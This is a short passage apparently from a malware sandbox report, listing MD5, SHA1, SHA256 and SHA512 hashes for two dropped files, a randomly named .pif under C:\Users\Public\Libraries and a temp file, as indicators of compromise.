| SHA256 | d3bf0cabd6ac5c52e6a7dde6b3853d5c6963b839a611ea310a883dfb11e96087 |
| SHA512 | cd01aa45eeb1b34ce024b55f8c9123126c5892595c2ea54d5db6de6d7df8eb085476e0788ad8120d9f9f998d831bf751bdc4e6839736cbb88957302e8c9db813 |
C:\Users\Public\Libraries\hlbycpzR.pif
| MD5 | c116d3604ceafe7057d77ff27552c215 |
| SHA1 | 452b14432fb5758b46f2897aeccd89f7c82a727d |
| SHA256 | 7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301 |
| SHA512 | 9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6 |
C:\Users\Admin\AppData\Local\Temp\xnqchqzrpwfawvtvriacir
| MD5 | 73ddf6cd83c2ad8a2fbb2383e322ffbc |
| SHA1 | 05270f8bb7b5cc6ab9a61ae7453d047379089147 |
| SHA256 | 0ef9194c6e90b23c416316fc5a15f549ee5b2472014fcd7648d72ca9a865b409 |
| SHA512 | 714db1956faa795005b15324b9604105881d6b484fe899876fe0df85783c61a72f556a875833af8625625212503b95eea2eb353a1d98f6a7af47a3658ea5262d |